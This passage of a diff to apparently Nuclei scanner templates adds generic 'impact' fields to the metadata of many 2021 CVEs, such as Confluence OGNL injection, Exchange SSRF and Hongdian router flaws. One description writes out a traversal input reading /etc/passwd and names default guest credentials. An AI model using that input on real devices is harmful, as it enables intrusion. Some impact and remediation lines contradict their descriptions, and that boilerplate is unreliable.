inclusion via the res.sendFile API. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Apply the latest security patch or update to a non-vulnerable version of Hue Magic. reference: diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 2e7c1d2104..198d295156 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1. reference: diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index 10369d9c7f..ed297fce3e 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk,philippedelteil severity: critical description: Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server. remediation: | Apply the latest security patches provided by Atlassian to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index 99d0721b9f..8622f42cdc 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint. + impact: | + An attacker can access sensitive information stored on the server, potentially leading to unauthorized access or data leakage. remediation: | Apply the latest security patches provided by Atlassian to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index cf7020a4e4..2284ac4f46 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -5,6 +5,8 @@ info: author: cocxanh severity: medium description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. + impact: | + This vulnerability can result in unauthorized access to sensitive files and data, as well as potential remote code execution, leading to a complete compromise of the affected system. remediation: | Apply the latest security patches and updates provided by Atlassian to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index 8c8849cb6f..230fbbb8df 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: Cacti contains a cross-site scripting vulnerability via "http:///auth_changepassword.php?ref=" which can successfully execute the JavaScript payload present in the "ref" URL parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a patched version of Cacti to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index bc6c4713ba..d18c491ea4 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Apache OFBiz to version 17.12.06 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26475.yaml b/http/cves/2021/CVE-2021-26475.yaml index 140b88e854..3a098d554e 100644 --- a/http/cves/2021/CVE-2021-26475.yaml +++ b/http/cves/2021/CVE-2021-26475.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 367e83c8a4..55893da081 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -5,6 +5,8 @@ info: author: gy741,pdteam severity: medium description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can bypass authorization and gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index ba3f7fb1bf..68adf2a6e8 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: medium description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index 8da4e9a6ad..d6d8b5fa8d 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Redwood Report2Web 4.3.4.5 and 4.5.3 contains a cross-site scripting vulnerability in the login panel which allows remote attackers to inject JavaScript via the signIn.do urll parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of Redwood Report2Web or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index 3ea563f107..e1625f1cd1 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jenzabar 9.2.x through 9.2.2 contains a cross-site scripting vulnerability. It allows /ics?tool=search&query. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Jenzabar 9.2x-9.2.2. reference: diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index 638d1b6eeb..89b7d6ac1b 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -5,6 +5,8 @@ info: author: aceseven (digisec360) severity: medium description: Moodle Jitsi Meet 2.7 through 2.8.3 plugin contains a cross-site scripting vulnerability via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject JavaScript code to be run by the application. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Moodle Jitsi Meet plugin to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 8c3ec7fcd9..9ece21f683 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or further compromise of the affected system. remediation: Apply the appropriate security update. reference: - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855 diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index 02a1929e04..3c9f3b6c2a 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml index ff6b059eeb..c36b353a79 100644 --- a/http/cves/2021/CVE-2021-27132.yaml +++ b/http/cves/2021/CVE-2021-27132.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header. + impact: | + Successful exploitation of this vulnerability could lead to various attacks, including session hijacking, cross-site scripting (XSS), and cache poisoning. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index 4b57615c9a..d3bf09fd80 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "module" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Clansphere CMS or apply the vendor-supplied patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml index 2ee3be43db..60311b973e 100644 --- a/http/cves/2021/CVE-2021-27310.yaml +++ b/http/cves/2021/CVE-2021-27310.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: medium description: Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "language" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index 99c90f0c20..840808e120 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL injection in admin.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via username parameter at login page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index e69731e2fb..890d279135 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index 369b3531ab..25fa374933 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index aa30b7c9dc..73ba4d9bb6 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index 83bf28b5cf..46059ee873 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index 381d356781..51d0e9bf08 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Triconsole Datepicker Calendar before 3.77 contains a cross-site scripting vulnerability in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Triconsole Datepicker Calendar that properly validates user input to prevent XSS attacks. reference: diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index eddc5dc5ab..edda947971 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -5,6 +5,8 @@ info: author: pdteam,bing0o severity: high description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set. + impact: | + An attacker can create snapshots of sensitive data without authentication, potentially leading to unauthorized access and data exposure. remediation: | Upgrade to the latest version of Grafana that includes a fix for CVE-2021-27358 or apply the provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index 69dd47543f..cd5f31f29f 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index 426988e263..2c7a2e7be3 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml index 12598f1e72..5ddb6a2c74 100644 --- a/http/cves/2021/CVE-2021-27561.yaml +++ b/http/cves/2021/CVE-2021-27561.yaml @@ -5,6 +5,8 @@ info: author: shifacyclewala,hackergautam severity: critical description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. remediation: | Update to the latest firmware version provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index 1e217d1a6c..9eb61ce54b 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml @@ -5,6 +5,8 @@ info: author: idealphase,daffainfo severity: critical description: Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass vulnerability because the password reset functionality for local accounts can be used to bypass local authentication checks. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Pega Infinity application. remediation: | Apply the necessary security patches or updates provided by Pega Infinity to mitigate the authentication bypass vulnerability (CVE-2021-27651). reference: diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index e32163c677..4eeebf3dd7 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: critical description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. remediation: | Upgrade to a patched version of Appspace 6.2.4 or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-27748.yaml b/http/cves/2021/CVE-2021-27748.yaml index 055b63b576..11959f2e93 100644 --- a/http/cves/2021/CVE-2021-27748.yaml +++ b/http/cves/2021/CVE-2021-27748.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks. remediation: | Apply the latest security patches or updates provided by IBM to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index e917fc45fe..d799bfe3f8 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Apache to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index 0db18cbab7..04cd5c694c 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -5,6 +5,8 @@ info: author: hackergautam severity: critical description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. remediation: This issue is resolved in Apache Solr 8.8.2 and later. reference: - https://www.anquanke.com/post/id/238201 diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index 6a9ade1838..d0cddd46a1 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -5,6 +5,8 @@ info: author: kiransau severity: medium description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade Mautic to version 3.3.4 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index 28d5a548cf..6e7949089f 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: critical description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server compromise, or further attacks on internal systems. remediation: | Upgrade LumisXP to version 10.0.0 or above to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-28073.yaml b/http/cves/2021/CVE-2021-28073.yaml index e67ff20802..7ff2de4d89 100644 --- a/http/cves/2021/CVE-2021-28073.yaml +++ b/http/cves/2021/CVE-2021-28073.yaml @@ -5,6 +5,8 @@ info: author: z3bd severity: critical description: Ntopng, a passive network monitoring tool, contains an authentication bypass vulnerability in ntopng <= 4.2 + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive information and potential compromise of the affected system. remediation: Upgrade to version 4.3 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-27573 diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml index 3f068794ef..5499859f1c 100644 --- a/http/cves/2021/CVE-2021-28149.yaml +++ b/http/cves/2021/CVE-2021-28149.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive files, potentially leading to further compromise of the system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Hongdian H8922 3.0.5 Devices. reference: diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index 460ebad7ed..035227403f 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to the exposure of sensitive data, potentially compromising the confidentiality of the system and its users. remediation: | Apply the latest security patch or update provided by Hongdian to fix the information disclosure vulnerability (CVE-2021-28150). reference: diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index 9d42e5213f..8d45e6e4b5 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Hongdian H8922 3.0.5 devices are susceptible to remote command injection via shell metacharacters into the ip-address (a/k/a Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. remediation: | Apply the latest security patch or update to a non-vulnerable version of the Hongdian H8922 firmware. reference: diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml index 802b0581a2..092459817e 100644 --- a/http/cves/2021/CVE-2021-28164.yaml +++ b/http/cves/2021/CVE-2021-28164.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224 is susceptible to improper authorization. The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. An attacker can access sensitive information regarding the implementation of a web application. + impact: | + An attacker can exploit this vulnerability to access sensitive information, potentially leading to further attacks or unauthorized access. remediation: | Apply the latest security patches or updates provided by the Eclipse Jetty project to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index 79e008577d..1a3f6e8474 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Eclipse Jetty through 9.4.40, through 10.0.2, and through 11.0.2 is susceptible to information disclosure. Requests to the ConcatServlet with a doubly encoded path can access protected resources within the WEB-INF directory, thus enabling an attacker to potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to access sensitive information, potentially leading to further attacks or unauthorized access. remediation: | Upgrade to Eclipse Jetty version 9.4.40 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 4c090d416e..0294221a63 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing remote code execution. remediation: | Update Joomla! ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml index 8679d0e00b..1dd636196d 100644 --- a/http/cves/2021/CVE-2021-28419.yaml +++ b/http/cves/2021/CVE-2021-28419.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to a patched version of SEO Panel or apply the necessary security patches. reference: diff --git a/http/cves/2021/CVE-2021-28854.yaml b/http/cves/2021/CVE-2021-28854.yaml index af172ac5ad..668847f255 100644 --- a/http/cves/2021/CVE-2021-28854.yaml +++ b/http/cves/2021/CVE-2021-28854.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as user credentials or customer data. remediation: | Apply the latest security patches and updates provided by VICIdial to fix the vulnerability and ensure sensitive information is properly protected. reference: diff --git a/http/cves/2021/CVE-2021-28918.yaml b/http/cves/2021/CVE-2021-28918.yaml index a25902df3e..de0a8001d2 100644 --- a/http/cves/2021/CVE-2021-28918.yaml +++ b/http/cves/2021/CVE-2021-28918.yaml @@ -5,6 +5,8 @@ info: author: johnjhacking severity: critical description: Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to 